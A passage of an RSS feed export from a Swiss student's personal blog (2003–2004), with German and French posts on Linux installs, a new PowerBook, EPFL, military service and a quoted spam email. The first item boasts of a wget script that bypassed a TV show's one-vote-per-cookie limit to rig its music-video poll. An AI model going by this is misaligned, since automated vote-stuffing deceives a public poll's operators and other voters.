  12792.    <content:encoded><![CDATA[Ich hab heut Nachmittag kurz durchs Fernsehprogramm gezappt. Dabei bin ich bei <a href=""><b>Roboclip</b></a> hängen geblieben. Das ist eine automatisierte Sendung, welche Musikvideos abspielt. Für das abzuspielende Musikvideo kann man per Telefon, SMS oder Internet stimmen. Das hat mich als Internet-Junkie natürlich interessiert und ich musste das ausprobieren. Leider kann man für ein Musikvideo nur einmal stimmen, aber um die einigermassen hörbaren Musikvideos abspielen zu lassen braucht es so rund 100 Stimmen. Die Stimmenregistrierung erfolgt mit einem PHP-Script, das Cookies verwendet. Da ich eine Veranlagung zum Experimentieren habe, hats nicht lange gedauert und ich habe nun ein kleines Shell-Skript, das mittels wget das Stimmen für ein Musikvideo automatisiert.<br><br>So ist es nun gekommen, dass "Apocalyptica Feat. Nina Hagen - Seemann" und "Metallica - Frantic", welche fast keine Stimmen hatten, plötzlich gerade nacheinander abgespielt wurden ;-) Danach war leider die Sendezeit von Roboclip zuende :-)
  12793. ]]></content:encoded>
  12794.  </item>
  12796.  <item>
  12797.    <title>Hallo 2004!</title>
  12798.    <link></link>
  12799.    <guid isPermaLink="true"></guid>
  12800.    <dc:creator>Andreas Jaggi</dc:creator>
  12801.    <creativeCommons:license></creativeCommons:license>
  12802.    <pubDate>Thu, 01 Jan 2004 02:06:00 +0100</pubDate>
  12803.    <category domain="">Misc</category>
  12804.    <description><![CDATA[Dies ist die erste Spam-Mail dieses Jahres:<br><br>X-shadow
  12805. <p>Its really HERE!!Playfriends <br>
  12806.  is a new site to help you find someone in your area that is looking for the same thing you are,<br>
  12807.  with no strings attached; waiting for you to fulfill their needs and vice versus!!<br>
  12808.  Dont waste any more im=
  12809. e.Go Now.</p><br>
  12810. <p>Just tell them what u are looking for, and presto, your=
  12811. set up with exactly what u =
  12812. ordered, and<br>
  12813.  youll be what they want, someone to pleasure until your completely content, and then u can find<br>
  12814.  someone else to do the same. Just tell us what u want, and well find it..<br>
  12815.  Tired of bad dates?!?, <br>
  12816.  Meet someone in your area tonight. </p><br>
  12817. iecyxfxwth dtip vwlrhwesprcg
  12818. mpr zwtr
  12819. dwmmgkoods
  12820. o  mglnqooyujggg
  12821. g
  12822. ipzxvebhlv<br>
  12823. beamli xsokbczbglh ule
  12824. z  if  cvnjdxd
  12825. gygkee dx edk
  12826. ypt viid
  12827. ifn
  12828. pgilc henh<br>
  12829. glzqu ucqjumhpigbcuby
  12830. ada dvp
  12831. weyunvvi bhbstzjptzesowk
  12832. la<br>nv ajr
  12833. x gt   a  ufpl i  pvcrtaj qrsdo
  12834. ]]></description>
  12835.    <content:encoded><![CDATA[Dies ist die erste Spam-Mail dieses Jahres:<br><br>X-shadow
  12836. <p>Its really HERE!!Playfriends <br>
  12837.  is a new site to help you find someone in your area that is looking for the same thing you are,<br>
  12838.  with no strings attached; waiting for you to fulfill their needs and vice versus!!<br>
  12839.  Dont waste any more im=
  12840. e.Go Now.</p><br>
  12841. <p>Just tell them what u are looking for, and presto, your=
  12842. set up with exactly what u =
  12843. ordered, and<br>
  12844.  youll be what they want, someone to pleasure until your completely content, and then u can find<br>
  12845.  someone else to do the same. Just tell us what u want, and well find it..<br>
  12846.  Tired of bad dates?!?, <br>
  12847.  Meet someone in your area tonight. </p><br>
  12848. iecyxfxwth dtip vwlrhwesprcg
  12849. mpr zwtr
  12850. dwmmgkoods
  12851. o  mglnqooyujggg
  12852. g
  12853. ipzxvebhlv<br>
  12854. beamli xsokbczbglh ule
  12855. z  if  cvnjdxd
  12856. gygkee dx edk
  12857. ypt viid
  12858. ifn
  12859. pgilc henh<br>
  12860. glzqu ucqjumhpigbcuby
  12861. ada dvp
  12862. weyunvvi bhbstzjptzesowk
  12863. la<br>nv ajr
  12864. x gt   a  ufpl i  pvcrtaj qrsdo
  12865. ]]></content:encoded>
  12866.  </item>
  12868.  <item>
  12869.    <title>Mandrake</title>
  12870.    <link></link>
  12871.    <guid isPermaLink="true"></guid>
  12872.    <dc:creator>Andreas Jaggi</dc:creator>
  12873.    <creativeCommons:license></creativeCommons:license>
  12874.    <pubDate>Tue, 30 Dec 2003 16:02:00 +0100</pubDate>
  12875.    <category domain="">Linux</category>
  12876.    <description><![CDATA[Auf dem alten Pentium II meiner Eltern habe ich gestern <a href=""><b>Mandrake Linux 9.2</b></a> installiert.<br>Nun taucht plötzlich folgendes Problem auf: In X funktioniert die Maus nicht (/dev/psaux und /dev/mouse ist "busy") und das Netzwerk will auch nicht mehr. Wenn ich beim Booten das Starten des eth0-Interfaces überspringe, funktioniert die Maus, aber das Netzwerk will auch nach manuellem initialisieren nicht funktionieren.<br>Die Maus ist eine PS/2 Logitech, und die Netzwerkkarte eine ISA-3Com-3c509 (das entsprechende Kernelmodul lädt ohne Fehlermeldung oder ähnliches). Irgendwelche Ideen? Lösung?<br><br>Mandrake benutzt eine RPM-basierte Packetverwaltung. Defaultmässig sind dort nur die Pakete auffindbar, die auf der Installations-CD sind. Da ich aber nur die erste Installations-CD besitze, habe ich auf <a href=""><b></b></a> ein bisschen rumgeschaut und die URLs und die Dateien in die Mandrake-Paketverwaltung integriert, so dass ich Zugriff auf (alle?) Mandrake-Pakete habe. Jedoch habe ich auch dort einige Pakete nicht gefunden. So fehlen mir immernoch der Acrobat Reader und der Flashplayer etc. Weiss zufällugerweise jemand, wo ich diese finden kann?
  12877. ]]></description>
  12878.    <content:encoded><![CDATA[Auf dem alten Pentium II meiner Eltern habe ich gestern <a href=""><b>Mandrake Linux 9.2</b></a> installiert.<br>Nun taucht plötzlich folgendes Problem auf: In X funktioniert die Maus nicht (/dev/psaux und /dev/mouse ist "busy") und das Netzwerk will auch nicht mehr. Wenn ich beim Booten das Starten des eth0-Interfaces überspringe, funktioniert die Maus, aber das Netzwerk will auch nach manuellem initialisieren nicht funktionieren.<br>Die Maus ist eine PS/2 Logitech, und die Netzwerkkarte eine ISA-3Com-3c509 (das entsprechende Kernelmodul lädt ohne Fehlermeldung oder ähnliches). Irgendwelche Ideen? Lösung?<br><br>Mandrake benutzt eine RPM-basierte Packetverwaltung. Defaultmässig sind dort nur die Pakete auffindbar, die auf der Installations-CD sind. Da ich aber nur die erste Installations-CD besitze, habe ich auf <a href=""><b></b></a> ein bisschen rumgeschaut und die URLs und die Dateien in die Mandrake-Paketverwaltung integriert, so dass ich Zugriff auf (alle?) Mandrake-Pakete habe. Jedoch habe ich auch dort einige Pakete nicht gefunden. So fehlen mir immernoch der Acrobat Reader und der Flashplayer etc. Weiss zufällugerweise jemand, wo ich diese finden kann?
  12879. ]]></content:encoded>
  12880.  </item>
  12882.  <item>
  12883.    <title>SwissBlogs</title>
  12884.    <link></link>
  12885.    <guid isPermaLink="true"></guid>
  12886.    <dc:creator>Andreas Jaggi</dc:creator>
  12887.    <creativeCommons:license></creativeCommons:license>
  12888.    <pubDate>Sun, 28 Dec 2003 01:00:00 +0100</pubDate>
  12889.    <category domain="">Misc</category>
  12890.    <description><![CDATA[<a href=""><b></b></a> est une liste des weblogs suisses qui contient maintenant aussi mon weblog. ce truc est fondé par <a href=""><b>Stephanie Booth</b></a>.
  12891. ]]></description>
  12892.    <content:encoded><![CDATA[<a href=""><b></b></a> est une liste des weblogs suisses qui contient maintenant aussi mon weblog. ce truc est fondé par <a href=""><b>Stephanie Booth</b></a>.
  12893. ]]></content:encoded>
  12894.  </item>
  12896.  <item>
  12897.    <title>46° 33' 18", 7° 22' 13"</title>
  12898.    <link></link>
  12899.    <guid isPermaLink="true"></guid>
  12900.    <dc:creator>Andreas Jaggi</dc:creator>
  12901.    <creativeCommons:license></creativeCommons:license>
  12902.    <pubDate>Sun, 28 Dec 2003 00:30:00 +0100</pubDate>
  12903.    <category domain="">Misc</category>
  12904.    <description><![CDATA[Dank <a href=""><b>Maporama</b></a> weiss ich nun ungefähr meine Koordinaten und habe mich nun auch bei <a href=""><b>GeoURL</b></a> eingetragen.<br><br> <a href="" title="check out my neighbors in meatspace (">
  12905. <img alt="GeoURL" src="" width="52" height="14">
  12906. </a>
  12907. ]]></description>
  12908.    <content:encoded><![CDATA[Dank <a href=""><b>Maporama</b></a> weiss ich nun ungefähr meine Koordinaten und habe mich nun auch bei <a href=""><b>GeoURL</b></a> eingetragen.<br><br> <a href="" title="check out my neighbors in meatspace (">
  12909. <img alt="GeoURL" src="" width="52" height="14">
  12910. </a>
  12911. ]]></content:encoded>
  12912.  </item>
  12914.  <item>
  12915.    <title>Comme chaque année</title>
  12916.    <link></link>
  12917.    <guid isPermaLink="true"></guid>
  12918.    <dc:creator>Andreas Jaggi</dc:creator>
  12919.    <creativeCommons:license></creativeCommons:license>
  12920.    <pubDate>Wed, 24 Dec 2003 16:13:00 +0100</pubDate>
  12921.    <category domain="">Misc</category>
  12922.    <description><![CDATA[Bonnes fêtes
  12923. ]]></description>
  12924.    <content:encoded><![CDATA[Bonnes fêtes
  12925. ]]></content:encoded>
  12926.  </item>
  12928.  <item>
  12929.    <title>Alle Jahre wieder</title>
  12930.    <link></link>
  12931.    <guid isPermaLink="true"></guid>
  12932.    <dc:creator>Andreas Jaggi</dc:creator>
  12933.    <creativeCommons:license></creativeCommons:license>
  12934.    <pubDate>Wed, 24 Dec 2003 16:11:00 +0100</pubDate>
  12935.    <category domain="">Misc</category>
  12936.    <description><![CDATA[Schöne Feiertage allerseits
  12937. ]]></description>
  12938.    <content:encoded><![CDATA[Schöne Feiertage allerseits
  12939. ]]></content:encoded>
  12940.  </item>
  12942.  <item>
  12943.    <title>Linux on Mac</title>
  12944.    <link></link>
  12945.    <guid isPermaLink="true"></guid>
  12946.    <dc:creator>Andreas Jaggi</dc:creator>
  12947.    <creativeCommons:license></creativeCommons:license>
  12948.    <pubDate>Tue, 23 Dec 2003 00:25:00 +0100</pubDate>
  12949.    <category domain="">Linux</category>
  12950.    <description><![CDATA[Beim dritten Anlauf ist es endlich gelungen: Linux läuft mit X und Sound auf dem PowerBook :-)<br>Als Distribution dient wieder <a href=""><b>Gentoo</b></a>. Dank dem 2.6er-Kernel funktioniert der Sound mit ALSA nach einem insmod out of the box. Als WindowManager kommt <a href=""><b>Kahakai</b></a>, ein Blackbox/Fluxbox/Waimea-Clone zum Einsatz; <a href=""><b>Enlightenment</b></a>, <a href=""><b>ratpoison</b></a>, <a href=""><b>evilwm</b></a>, <a href=""><b>pwm</b></a> und <a href=""><b>pekwm</b></a> will ich aber auch noch ausprobieren.<br><br>Leider ist der WLAN-Chip der Airport Extreme-Karte von Broadcom, welche ja bekanntlich keine Treiber für Linux haben. Auch der Erfolg des <a href=""><b>NdisWrapper</b></a> bringt mich nicht weiter, da zwar der gleiche Chip in der Karte steckt jedoch der NdisWrapper nur auf x86 funktioniert :-(<br>Mal schauen ob ich noch das SuperDrive zum brennen kriege...<br><br><a href=""><b>Aqua on Linux</b></a>
  12951. ]]></description>
  12952.    <content:encoded><![CDATA[Beim dritten Anlauf ist es endlich gelungen: Linux läuft mit X und Sound auf dem PowerBook :-)<br>Als Distribution dient wieder <a href=""><b>Gentoo</b></a>. Dank dem 2.6er-Kernel funktioniert der Sound mit ALSA nach einem insmod out of the box. Als WindowManager kommt <a href=""><b>Kahakai</b></a>, ein Blackbox/Fluxbox/Waimea-Clone zum Einsatz; <a href=""><b>Enlightenment</b></a>, <a href=""><b>ratpoison</b></a>, <a href=""><b>evilwm</b></a>, <a href=""><b>pwm</b></a> und <a href=""><b>pekwm</b></a> will ich aber auch noch ausprobieren.<br><br>Leider ist der WLAN-Chip der Airport Extreme-Karte von Broadcom, welche ja bekanntlich keine Treiber für Linux haben. Auch der Erfolg des <a href=""><b>NdisWrapper</b></a> bringt mich nicht weiter, da zwar der gleiche Chip in der Karte steckt jedoch der NdisWrapper nur auf x86 funktioniert :-(<br>Mal schauen ob ich noch das SuperDrive zum brennen kriege...<br><br><a href=""><b>Aqua on Linux</b></a>
  12953. ]]></content:encoded>
  12954.  </item>
  12956.  <item>
  12957.    <title>Battlecry</title>
  12958.    <link></link>
  12959.    <guid isPermaLink="true"></guid>
  12960.    <dc:creator>Andreas Jaggi</dc:creator>
  12961.    <creativeCommons:license></creativeCommons:license>
  12962.    <pubDate>Wed, 10 Dec 2003 08:15:00 +0100</pubDate>
  12963.    <category domain="">Misc</category>
  12964.    <description><![CDATA[<form action="" method="get"><table style="text-align: center; width: 400px; border-spacing: 4px; border: 0"><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:16px;"><b>What Is Your Battle Cry?</b></p></td></tr><tr><td style="background-color: #ffbb77; text-align: center"><p style="margin:10px;font-family:'times new roman';font-size:16px;color:#000;"><span style="font-family: 'old english text mt','old english text'; font-size: 32px">P</span>rowling across the mini-mall parking lot, cutting down all who dare stand in the way using gilded boxing gloves, cometh <b>X-way</b>! And he gives a spectacular cry:</p><p style="margin:11px;font-family:'times new roman';font-size:18px;color:#000;"><b><i>"For the love of carnage and discord, I tear into the enemy until Satan himself emerges from the pit to thank me!"</i></b></p></td></tr><tr><td style="text-align: center; background-color: #aaaaaa"><p style="font-family:'times new roman';font-size:14px;color:#000;"><b>Find out!</b><br>Enter username: <input type="text" name="usrname" value="x-way"><br>Are you <input type="radio" name="sex" value="f">a girl, or <input type="radio" name="sex" value="m" checked="checked">a guy ?<br><input type="submit" value="Submit"></p></td></tr><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:12px;margin:0px;"><b>created by <a href=""><span style="color: #cc00ff; font-family: 'times new roman'">beatings</span></a> </b>:<b> powered by <a href=""><span style="color: #cc00ff; font-family: 'times new roman'">monkeys</span></a></b></p></td></tr></table></form><br><br>Gefunden bei <a href=""><b>mk</b></a>
  12965. ]]></description>
  12966.    <content:encoded><![CDATA[<form action="" method="get"><table style="text-align: center; width: 400px; border-spacing: 4px; border: 0"><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:16px;"><b>What Is Your Battle Cry?</b></p></td></tr><tr><td style="background-color: #ffbb77; text-align: center"><p style="margin:10px;font-family:'times new roman';font-size:16px;color:#000;"><span style="font-family: 'old english text mt','old english text'; font-size: 32px">P</span>rowling across the mini-mall parking lot, cutting down all who dare stand in the way using gilded boxing gloves, cometh <b>X-way</b>! And he gives a spectacular cry:</p><p style="margin:11px;font-family:'times new roman';font-size:18px;color:#000;"><b><i>"For the love of carnage and discord, I tear into the enemy until Satan himself emerges from the pit to thank me!"</i></b></p></td></tr><tr><td style="text-align: center; background-color: #aaaaaa"><p style="font-family:'times new roman';font-size:14px;color:#000;"><b>Find out!</b><br>Enter username: <input type="text" name="usrname" value="x-way"><br>Are you <input type="radio" name="sex" value="f">a girl, or <input type="radio" name="sex" value="m" checked="checked">a guy ?<br><input type="submit" value="Submit"></p></td></tr><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:12px;margin:0px;"><b>created by <a href=""><span style="color: #cc00ff; font-family: 'times new roman'">beatings</span></a> </b>:<b> powered by <a href=""><span style="color: #cc00ff; font-family: 'times new roman'">monkeys</span></a></b></p></td></tr></table></form><br><br>Gefunden bei <a href=""><b>mk</b></a>
  12967. ]]></content:encoded>
  12968.  </item>
  12970.  <item>
  12971.    <title>Photo vom Panther</title>
  12972.    <link></link>
  12973.    <guid isPermaLink="true"></guid>
  12974.    <dc:creator>Andreas Jaggi</dc:creator>
  12975.    <creativeCommons:license></creativeCommons:license>
  12976.    <pubDate>Sat, 06 Dec 2003 01:14:00 +0100</pubDate>
  12977.    <category domain="">Linux</category>
  12978.    <description><![CDATA[Ein <a href=""><b>hübsches Bildchen</b></a> von meinem neuen Gerät:<br><a href=""><b>Sylpheed</b></a> läuft auf einem anderen Rechner (nuntia) und die <a href=""><b>X11</b></a>-Ausgabe wird via <a href=""><b>SSH</b></a> zum X11 vom Mac umgeleitet. Davor das Terminal mit der SSH-Session und das Terminal vom Mac. Dahinter noch <a href=""><b>Safari</b></a>, der <a href=""><b>KHTML</b></a>-basierte Browser von <a href=""><b>Apple</b></a>. Zuunterst das "berühmte" Dock.<br><br>Und nun startet der Installationsversuch Nummer 2 von Linux. Diesmal mit einer seperaten /boot-Partition und vermutlich auch gerade Kernel 2.6...
  12979. ]]></description>
  12980.    <content:encoded><![CDATA[Ein <a href=""><b>hübsches Bildchen</b></a> von meinem neuen Gerät:<br><a href=""><b>Sylpheed</b></a> läuft auf einem anderen Rechner (nuntia) und die <a href=""><b>X11</b></a>-Ausgabe wird via <a href=""><b>SSH</b></a> zum X11 vom Mac umgeleitet. Davor das Terminal mit der SSH-Session und das Terminal vom Mac. Dahinter noch <a href=""><b>Safari</b></a>, der <a href=""><b>KHTML</b></a>-basierte Browser von <a href=""><b>Apple</b></a>. Zuunterst das "berühmte" Dock.<br><br>Und nun startet der Installationsversuch Nummer 2 von Linux. Diesmal mit einer seperaten /boot-Partition und vermutlich auch gerade Kernel 2.6...
  12981. ]]></content:encoded>
  12982.  </item>
  12984.  <item>
  12985.    <title>Wieder mal was zum Gentoo</title>
  12986.    <link></link>
  12987.    <guid isPermaLink="true"></guid>
  12988.    <dc:creator>Andreas Jaggi</dc:creator>
  12989.    <creativeCommons:license></creativeCommons:license>
  12990.    <pubDate>Fri, 05 Dec 2003 12:03:00 +0100</pubDate>
  12991.    <category domain="">Linux</category>
  12992.    <description><![CDATA[<img alt="Gentoo Emerge Comic" src=""><br><br>Weitere solche Comics bei <a href=""><b>es.comp.os.linux.*</b></a>
  12993. ]]></description>
  12994.    <content:encoded><![CDATA[<img alt="Gentoo Emerge Comic" src=""><br><br>Weitere solche Comics bei <a href=""><b>es.comp.os.linux.*</b></a>
  12995. ]]></content:encoded>
  12996.  </item>
  12998.  <item>
  12999.    <title>argyraspides</title>
  13000.    <link></link>
  13001.    <guid isPermaLink="true"></guid>
  13002.    <dc:creator>Andreas Jaggi</dc:creator>
  13003.    <creativeCommons:license></creativeCommons:license>
  13004.    <pubDate>Thu, 27 Nov 2003 09:52:00 +0100</pubDate>
  13005.    <category domain="">Mac</category>
  13006.    <description><![CDATA[Da sich nun der Adrelaninsturm ein bisschen gelegt hat, folgendes:<br>Seit gestern Mittag habe ich nun auch so einen tragbaren Computer, ein Apple PowerBook G4 15 Zoll mit Superdrive um etwas genauer zu sein.<br>Das GUI ist sehr schön, jedoch sehr oft nur eine Spielerei, die nicht wirklich nützlich ist.<br>Was mir gefällt ist, dass man mit Bluetooth fast ganz einfach die Adressdaten, Kalender etc. vom Natel zum Computer kopieren kann und umgekehrt.<br>Weitere Erfahrungsberichte werden sicher folgen :-)
  13007. ]]></description>
  13008.    <content:encoded><![CDATA[Da sich nun der Adrelaninsturm ein bisschen gelegt hat, folgendes:<br>Seit gestern Mittag habe ich nun auch so einen tragbaren Computer, ein Apple PowerBook G4 15 Zoll mit Superdrive um etwas genauer zu sein.<br>Das GUI ist sehr schön, jedoch sehr oft nur eine Spielerei, die nicht wirklich nützlich ist.<br>Was mir gefällt ist, dass man mit Bluetooth fast ganz einfach die Adressdaten, Kalender etc. vom Natel zum Computer kopieren kann und umgekehrt.<br>Weitere Erfahrungsberichte werden sicher folgen :-)
  13009. ]]></content:encoded>
  13010.  </item>
  13012.  <item>
  13013.    <title>Wochenende</title>
  13014.    <link></link>
  13015.    <guid isPermaLink="true"></guid>
  13016.    <dc:creator>Andreas Jaggi</dc:creator>
  13017.    <creativeCommons:license></creativeCommons:license>
  13018.    <pubDate>Sun, 23 Nov 2003 12:02:00 +0100</pubDate>
  13019.    <category domain="">Misc</category>
  13020.    <description><![CDATA[Am Freitag war ich mit ein paar Kollegen von der <a href=""><b>EPFL</b></a> an der <b><a href="">Nacht der Kurzfilme</a></b> in <a href=""><b>Lausanne</b></a>. Da liefen von 20 Uhr an ungefähr 50 Kurzfilme und um 5 Uhr am Morgen gabs für alle, die solange ausgeharrt hatten, noch Café &amp; Croissants.<br><br>Nach 2 Stunden Schlaf gings dann wieder auf, um den ganzen Tag am <a href=""><b>Installfest</b></a> der <a href=""><b>GNU Generation</b></a> (Verein von Studenten der <a href=""><b>EPFL</b></a> zur Promotion von <a href=""><b>GNU/Linux</b></a> und <a href=""><b>freier Software</b></a>) als <abbr title="Gentil Installateur = Netter Installateur">GI</abbr> mitzuhelfen; d.h. ganz vielen Leuten helfen GNU/Linux zu installieren und jenste Hardwareteile zum Funktionieren überreden.
  13021. ]]></description>
  13022.    <content:encoded><![CDATA[Am Freitag war ich mit ein paar Kollegen von der <a href=""><b>EPFL</b></a> an der <b><a href="">Nacht der Kurzfilme</a></b> in <a href=""><b>Lausanne</b></a>. Da liefen von 20 Uhr an ungefähr 50 Kurzfilme und um 5 Uhr am Morgen gabs für alle, die solange ausgeharrt hatten, noch Café &amp; Croissants.<br><br>Nach 2 Stunden Schlaf gings dann wieder auf, um den ganzen Tag am <a href=""><b>Installfest</b></a> der <a href=""><b>GNU Generation</b></a> (Verein von Studenten der <a href=""><b>EPFL</b></a> zur Promotion von <a href=""><b>GNU/Linux</b></a> und <a href=""><b>freier Software</b></a>) als <abbr title="Gentil Installateur = Netter Installateur">GI</abbr> mitzuhelfen; d.h. ganz vielen Leuten helfen GNU/Linux zu installieren und jenste Hardwareteile zum Funktionieren überreden.
  13023. ]]></content:encoded>
  13024.  </item>
  13026.  <item>
  13027.    <title>Feines Dessert</title>
  13028.    <link></link>
  13029.    <guid isPermaLink="true"></guid>
  13030.    <dc:creator>Andreas Jaggi</dc:creator>
  13031.    <creativeCommons:license></creativeCommons:license>
  13032.    <pubDate>Sat, 15 Nov 2003 17:39:00 +0100</pubDate>
  13033.    <category domain="">Misc</category>
  13034.    <description><![CDATA[Gerade zum besten Desser erkohren:<br>Vermicelle mit Schockoladencrème und Schlagrahm<br>Einfach spitze :-)
  13035. ]]></description>
  13036.    <content:encoded><![CDATA[Gerade zum besten Desser erkohren:<br>Vermicelle mit Schockoladencrème und Schlagrahm<br>Einfach spitze :-)
  13037. ]]></content:encoded>
  13038.  </item>
  13040.  <item>
  13041.    <title>Shipped !!!</title>
  13042.    <link></link>
  13043.    <guid isPermaLink="true"></guid>
  13044.    <dc:creator>Andreas Jaggi</dc:creator>
  13045.    <creativeCommons:license></creativeCommons:license>
  13046.    <pubDate>Fri, 14 Nov 2003 21:09:00 +0100</pubDate>
  13047.    <category domain="">Misc</category>
  13048.    <description><![CDATA[<img alt="Shipped" src=""><br><br>Endich! Am Abend des 13. Novembers durfte ich entdecken, dass mein Packet die Fabrik in Irland verlassen hat *freu*<br>Leider funktionieren die angegebenen Trackingnummern nicht :-(
  13049. ]]></description>
  13050.    <content:encoded><![CDATA[<img alt="Shipped" src=""><br><br>Endich! Am Abend des 13. Novembers durfte ich entdecken, dass mein Packet die Fabrik in Irland verlassen hat *freu*<br>Leider funktionieren die angegebenen Trackingnummern nicht :-(
  13051. ]]></content:encoded>
  13052.  </item>
  13054.  <item>
  13055.    <title>CSS Links</title>
  13056.    <link></link>
  13057.    <guid isPermaLink="true"></guid>
  13058.    <dc:creator>Andreas Jaggi</dc:creator>
  13059.    <creativeCommons:license></creativeCommons:license>
  13060.    <pubDate>Sat, 08 Nov 2003 17:42:00 +0100</pubDate>
  13061.    <category domain="">Webdesign</category>
  13062.    <description><![CDATA[Bei <a href=""><b>mk</b></a> ein paar (ältere) CSS Links gefunden:<br>
  13063. <a href=""><b>Little Boxes</b></a><br>
  13064. <a href=""><b>CSS @ Maxdesign</b></a><br>
  13065. <a href=""><b>CSS horizontal navigation list</b></a><br>
  13066. <a href=""><b>:hover mit beliebigen Elementen</b></a><br>
  13067. <a href=""><b>pure CSS menus</b></a><br>
  13068. ]]></description>
  13069.    <content:encoded><![CDATA[Bei <a href=""><b>mk</b></a> ein paar (ältere) CSS Links gefunden:<br>
  13070. <a href=""><b>Little Boxes</b></a><br>
  13071. <a href=""><b>CSS @ Maxdesign</b></a><br>
  13072. <a href=""><b>CSS horizontal navigation list</b></a><br>
  13073. <a href=""><b>:hover mit beliebigen Elementen</b></a><br>
  13074. <a href=""><b>pure CSS menus</b></a><br>
  13075. ]]></content:encoded>
  13076.  </item>
  13078.  <item>
  13079.    <title>Weltweites Warten</title>
  13080.    <link></link>
  13081.    <guid isPermaLink="true"></guid>
  13082.    <dc:creator>Andreas Jaggi</dc:creator>
  13083.    <creativeCommons:license></creativeCommons:license>
  13084.    <pubDate>Sat, 08 Nov 2003 02:34:00 +0100</pubDate>
  13085.    <category domain="">Misc</category>
  13086.    <description><![CDATA[Bestellungen über das <abbr title="World Wide Web">WWW</abbr> sind in der Regel innert ein paar Tagen da. Jedoch diese Bestellung lässt auf sich warten: Nun sind schon fast zwei Wochen vergangen und es ist immernoch das gleiche Bild:<br><br><img src="" width="477" height="132" alt="Being Assembled">
  13087. ]]></description>
  13088.    <content:encoded><![CDATA[Bestellungen über das <abbr title="World Wide Web">WWW</abbr> sind in der Regel innert ein paar Tagen da. Jedoch diese Bestellung lässt auf sich warten: Nun sind schon fast zwei Wochen vergangen und es ist immernoch das gleiche Bild:<br><br><img src="" width="477" height="132" alt="Being Assembled">
  13089. ]]></content:encoded>
  13090.  </item>
  13092.  <item>
  13093.    <title>Zurück im Zivilleben</title>
  13094.    <link></link>
  13095.    <guid isPermaLink="true"></guid>
  13096.    <dc:creator>Andreas Jaggi</dc:creator>
  13097.    <creativeCommons:license></creativeCommons:license>
  13098.    <pubDate>Sun, 02 Nov 2003 10:51:00 +0100</pubDate>
  13099.    <category domain="">Misc</category>
  13100.    <description><![CDATA[Nun ist für eine (hoffentlich) lange Zeit fertig mit <a href=""><b>solchen</b></a> <a href=""><b>komischen</b></a> <a href=""><b>Verkleidungen</b></a>; die 15 Wochen <abbr title="Rekrutenschule = Obligatorische militärische Grundausbildung in der Schweiz">RS</abbr> sind vorbei.<br><br>Während der RS sah ich <a href=""><b>so</b></a> aus, nach der RS wieder <a href=""><b>so</b></a> (natürlich ohne das grüne Faschingskostüm) und in der letzten Woche <a href=""><b>so</b></a>, was jedoch meinen Vorgesetzten nicht so gefiel und daher nur einen halben Tag lang dauerte :-)<br><br>Und nun studiere ich an der <a href=""><b>EPFL</b></a> bis auf weiteres Informatik.
  13101. ]]></description>
  13102.    <content:encoded><![CDATA[Nun ist für eine (hoffentlich) lange Zeit fertig mit <a href=""><b>solchen</b></a> <a href=""><b>komischen</b></a> <a href=""><b>Verkleidungen</b></a>; die 15 Wochen <abbr title="Rekrutenschule = Obligatorische militärische Grundausbildung in der Schweiz">RS</abbr> sind vorbei.<br><br>Während der RS sah ich <a href=""><b>so</b></a> aus, nach der RS wieder <a href=""><b>so</b></a> (natürlich ohne das grüne Faschingskostüm) und in der letzten Woche <a href=""><b>so</b></a>, was jedoch meinen Vorgesetzten nicht so gefiel und daher nur einen halben Tag lang dauerte :-)<br><br>Und nun studiere ich an der <a href=""><b>EPFL</b></a> bis auf weiteres Informatik.
  13103. ]]></content:encoded>
  13104.  </item>
  13106.  <item>
  13107.    <title>Journée d'acceuil</title>
  13108.    <link></link>
  13109.    <guid isPermaLink="true"></guid>
  13110.    <dc:creator>Andreas Jaggi</dc:creator>
  13111.    <creativeCommons:license></creativeCommons:license>
  13112.    <pubDate>Sat, 18 Oct 2003 22:29:00 +0200</pubDate>
  13113.    <category domain="">School</category>
  13114.    <description><![CDATA[Hier j'étais à la journée d'acceuil à l'<a href=""><b>EPFL</b></a>. Où je commence le 27 octobre mes études en informatique.<br>À la fin de cette journée il y avait une apéro. Est-ce que c'est toujours comme ça?
  13115. ]]></description>
  13116.    <content:encoded><![CDATA[Hier j'étais à la journée d'acceuil à l'<a href=""><b>EPFL</b></a>. Où je commence le 27 octobre mes études en informatique.<br>À la fin de cette journée il y avait une apéro. Est-ce que c'est toujours comme ça?
  13117. ]]></content:encoded>
  13118.  </item>
  13120.  <item>
  13121.    <title></title>
  13122.    <link></link>
  13123.    <guid isPermaLink="true"></guid>
  13124.    <dc:creator>Andreas Jaggi</dc:creator>
  13125.    <creativeCommons:license></creativeCommons:license>
  13126.    <pubDate>Sun, 12 Oct 2003 17:23:00 +0200</pubDate>
  13127.    <category domain="">Misc</category>
  13128.    <description><![CDATA[Erst heute entdeckt: <a href=""><b></b></a>, die Website von nem Kameraden aus der RS. Dort findet mensch unter anderem interessante Texte zu Verschlüsselung, E-Mail-Verkehr, proprietäre Dateiformate, Datenschutz, Gnu/Linux etc.
  13129. ]]></description>
  13130.    <content:encoded><![CDATA[Erst heute entdeckt: <a href=""><b></b></a>, die Website von nem Kameraden aus der RS. Dort findet mensch unter anderem interessante Texte zu Verschlüsselung, E-Mail-Verkehr, proprietäre Dateiformate, Datenschutz, Gnu/Linux etc.
  13131. ]]></content:encoded>
  13132.  </item>
  13134.  <item>
  13135.    <title> What kind of thinker are you?</title>
  13136.    <link></link>
  13137.    <guid isPermaLink="true"></guid>
  13138.    <dc:creator>Andreas Jaggi</dc:creator>
  13139.    <creativeCommons:license></creativeCommons:license>
  13140.    <pubDate>Sun, 28 Sep 2003 19:40:00 +0200</pubDate>
  13141.    <category domain="">Misc</category>
  13142.    <description><![CDATA[<a href=""><b> What kind of thinker are you?</b></a><br><br>Ich bin ein 'Spatial Thinker', experimetierfreudiger Bastler halt ;-)<br><br>Gesehen bei <a href=""><b>mk</b></a>, <a href=""><b>sec</b></a> und <a href=""><b>rw</b></a>
  13143. ]]></description>
  13144.    <content:encoded><![CDATA[<a href=""><b> What kind of thinker are you?</b></a><br><br>Ich bin ein 'Spatial Thinker', experimetierfreudiger Bastler halt ;-)<br><br>Gesehen bei <a href=""><b>mk</b></a>, <a href=""><b>sec</b></a> und <a href=""><b>rw</b></a>
  13145. ]]></content:encoded>
  13146.  </item>
  13148.  <item>
  13149.    <title>Zug Frey in Action</title>
  13150.    <link></link>
  13151.    <guid isPermaLink="true"></guid>
